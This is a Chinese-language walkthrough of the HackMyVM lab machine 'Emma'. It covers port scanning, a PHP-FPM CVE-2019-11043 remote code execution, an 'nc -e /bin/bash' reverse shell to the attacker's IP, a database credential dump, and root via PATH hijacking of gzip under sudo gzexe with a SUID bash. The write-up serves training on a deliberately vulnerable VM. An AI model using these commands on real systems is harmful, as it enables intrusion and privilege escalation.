tags:
- HMV
- 环境变量劫持提权
- CVE-2019-11043
1. 基本信息^toc
文章目录
-
- [1. 基本信息^toc](#1. 基本信息^toc)
- [2. ️信息收集](#2. ️信息收集)
- [3. phpinfo漏洞利用](#3. phpinfo漏洞利用)
- [4. www-data提权emma](#4. www-data提权emma)
- [5. emma提权root](#5. emma提权root)
-
- [5.1. gzexe利用 劫持zip](#5.1. gzexe利用 劫持zip)
靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Emma
作者 Emma
难度 ⭐️⭐️⭐️⭐️
2. ️信息收集
bash
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# nmap -sCV 192.168.200.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 12:02 CST
Nmap scan report for chimichurri.thl (192.168.200.4)
Host is up (0.000090s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:4c:af:92:cc:bb:99:59:d7:2f:1b:99:fb:f1:7c:f0 (RSA)
| 256 ba:0d:85:69:43:86:c1:91:7c:db:2a:1e:34:ab:68:1e (ECDSA)
|_ 256 a1:ac:2c:ce:f4:07:da:96:12:74:d1:54:9e:f7:09:04 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Site doesn''t have a title (text/html; charset=UTF-8).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:64:B9:B4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.62 seconds
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# nmap 192.168.200.4 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 12:02 CST
Nmap scan report for chimichurri.thl (192.168.200.4)
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:64:B9:B4 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.65 seconds首页
bash
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# curl http://192.168.200.4
空的目录扫描
bash
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# dirsearch -u http://192.168.200.4
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/hmv/emma/reports/http_192.168.200.4/_24-12-04_12-05-14.txt
Target: http://192.168.200.4/
[12:05:14] Starting:
[12:05:29] 200 - 58KB - /phpinfo.php
[12:05:31] 200 - 15B - /robots.txt
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# curl http://192.168.200.4/robots.txt
itwasonlyakiss获取到一个关键字符串 itwasonlyakiss 可能是密码或者用户
3. phpinfo漏洞利用
给了我们Phpinfo.index
猜测是要打一波cve
看一下php的版本
版本为 7.1.33dev
找到一个rce的漏洞 [[.../.../20-网安/28-CVE复现/CVE-2019-11043|CVE-2019-11043]]
https://blog.csdn.net/qq_42133828/article/details/102868522
漏洞利用项目地址 github.com/neex/phuip-fpizdam
安装环境
bash
apt-get install golang
go get github.com/neex/phuip-fpizdam
export PATH=$PATH:$(go env GOPATH)/bin漏洞梭哈
bash
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# phuip-fpizdam http://192.168.42.43/index.php
2024/12/04 12:39:32 Base status code is 200
2024/12/04 12:39:32 Status code 502 for qsl=1765, adding as a candidate
2024/12/04 12:39:32 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2024/12/04 12:39:32 Attack params found: --qsl 1755 --pisos 23 --skip-detect
2024/12/04 12:39:32 Trying to set "session.auto_start=0"...
2024/12/04 12:39:32 Detect() returned attack params: --qsl 1755 --pisos 23 --skip-detect <-- REMEMBER THIS
2024/12/04 12:39:32 Performing attack using php.ini settings...
2024/12/04 12:39:33 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2024/12/04 12:39:33 Trying to cleanup /tmp/a...
2024/12/04 12:39:33 Done!反弹shell
bash
urlencode('id;nc -e /bin/bash 192.168.42.39 1234 ')
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# curl http://192.168.42.115/index.php/?a=/bin/sh+-c+%27id%3Bnc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201234%20%27
┌──(pwncat-env)─(root㉿kali)-[~]
└─# pwncat-cs -lp 1234
[12:41:29] Welcome to pwncat 🐈! __main__.py:164
[12:50:54] received connection from 192.168.42.115:55396 bind.py:84
[12:50:55] 192.168.42.115:55396: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@emma:/var/www/html$ whoami
www-data
(remote) www-data@emma:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@emma:/var/www/html$4. www-data提权emma
bash
(remote) www-data@emma:/var/www/html$ find / -perm /4000 2>/dev/null
/home/emma/who
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/mount靶机内部开放了 3306 端口
可以看一下数据库
数据库密码就是robots.txt 里面的那个 itwasonlyakiss
bash
remote) www-data@emma:/etc$ mysql -uroot -pitwasonlyakiss
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 13
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| users |
+--------------------+
4 rows in set (0.012 sec)
MariaDB [(none)]> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [users]> show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| users |
+-----------------+
1 row in set (0.000 sec)
MariaDB [users]> select * from users;
+----+------+----------------------------------+
| id | user | pass |
+----+------+----------------------------------+
| 1 | emma | 5f4dcc3b5aa765d61d8327deb882cf80 |
+----+------+----------------------------------+
1 row in set (0.000 sec)
5. emma提权root
这里有一个坑。 这个emma的密码不是解密后的明文 就是这个Md5值
bash
(remote) www-data@emma:/etc$ su emma
Password: 5f4dcc3b5aa765d61d8327deb882cf80
emma@emma:/etc$
emma@emma:~$ sh flag.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *,
-------------------------
PWNED HOST: emma
PWNED DATE: Wed 04 Dec 2024 12:16:48 AM EST
WHOAMI: uid=1000(emma) gid=1000(emma) groups=1000(emma),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
FLAG: youdontknowme
------------------------
bash
emma@emma:~$ cat who.c
#include <stdio.h>
#include <stdlib.h>
void main(){
setuid(0);
setgid(0);
printf("Im \n");
system("/bin/id");
setuid(1000);
setgid(1000);
printf("But now Im \n");
system("/bin/id");
}
emma@emma:~$ ls -la
total 64
drwxr-xr-x 4 emma emma 4096 Dec 4 00:14 .
drwxr-xr-x 3 root root 4096 Feb 4 2021 ..
-rw-r--r-- 1 emma emma 220 Feb 4 2021 .bash_logout
-rw-r--r-- 1 emma emma 3526 Feb 4 2021 .bashrc
-rwx------ 1 emma emma 1920 Feb 4 2021 flag.sh
drwx------ 3 emma emma 4096 Dec 4 00:14 .gnupg
drwxr-xr-x 3 emma emma 4096 Feb 4 2021 .local
-rw-r--r-- 1 emma emma 807 Feb 4 2021 .profile
-rw------- 1 emma emma 14 Feb 4 2021 user.txt
-rwsr-s--- 1 root emma 16760 Feb 4 2021 who
-rw-r--r-- 1 emma emma 185 Feb 4 2021 who.c
-rw------- 1 emma emma 50 Feb 4 2021 .Xauthority
emma@emma:~$ sudo -l
Matching Defaults entries for emma on emma:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User emma may run the following commands on emma:
(ALL : ALL) NOPASSWD: /usr/bin/gzexe我们可以用Root权限调用 gzexe 命令
5.1. gzexe利用 劫持zip
gzexe 实际上是一个脚本可以压缩一个可执行文件。而且这个被压缩后的文件名字不会被改变而且也可以被执行,执行被压缩后的可执行文件时 会调用gzip命令解压缩
我们可以通过环境变量劫持 gzip 来提权
但是要提权肯定是需要一个root 的权限去执行 gzip,
只要A 被 gzexe 压缩,那么执行 A 就会触发 gzip
关键点在于我们找哪个A 被 gzexe 压缩
要求A必须能被root权限执行
bash
emma@emma:~$ cat who.c
#include <stdio.h>
#include <stdlib.h>
void main(){
setuid(0);
setgid(0);
printf("Im \n");
system("/bin/id");
setuid(1000);
setgid(1000);
printf("But now Im \n");
system("/bin/id");
}
emma@emma:~$ ls -la
total 64
drwxr-xr-x 4 emma emma 4096 Dec 4 00:14 .
drwxr-xr-x 3 root root 4096 Feb 4 2021 ..
-rw-r--r-- 1 emma emma 220 Feb 4 2021 .bash_logout
-rw-r--r-- 1 emma emma 3526 Feb 4 2021 .bashrc
-rwx------ 1 emma emma 1920 Feb 4 2021 flag.sh
drwx------ 3 emma emma 4096 Dec 4 00:14 .gnupg
drwxr-xr-x 3 emma emma 4096 Feb 4 2021 .local
-rw-r--r-- 1 emma emma 807 Feb 4 2021 .profile
-rw------- 1 emma emma 14 Feb 4 2021 user.txt
-rwsr-s--- 1 root emma 16760 Feb 4 2021 who
-rw-r--r-- 1 emma emma 185 Feb 4 2021 who.c
-rw------- 1 emma emma 50 Feb 4 2021 .Xauthority可以发现我们是可以执行 who 的,而且 从 who.c 里面看出里面两次执行了 /bin/id ,
一次是root执行,一次是普通用户执行
那我们只要利用 gzexe 压缩 /bin/id,然后执行 who 触发 gzip 完成提权
bash
环境变量劫持gzip:
echo 'chmod +s /bin/bash' > /tmp/gzip
chmod +x /tmp/gzip
export PATH=/tmp:$PATH
gzexe压缩id:
gzexe /bin/id
执行who触发gzip完成提权
./who
bash -p
bash
bash-5.0# cat /root/root.txt
itsmeimshe
bash-5.0# cat /home/emma/user.txt
youdontknowme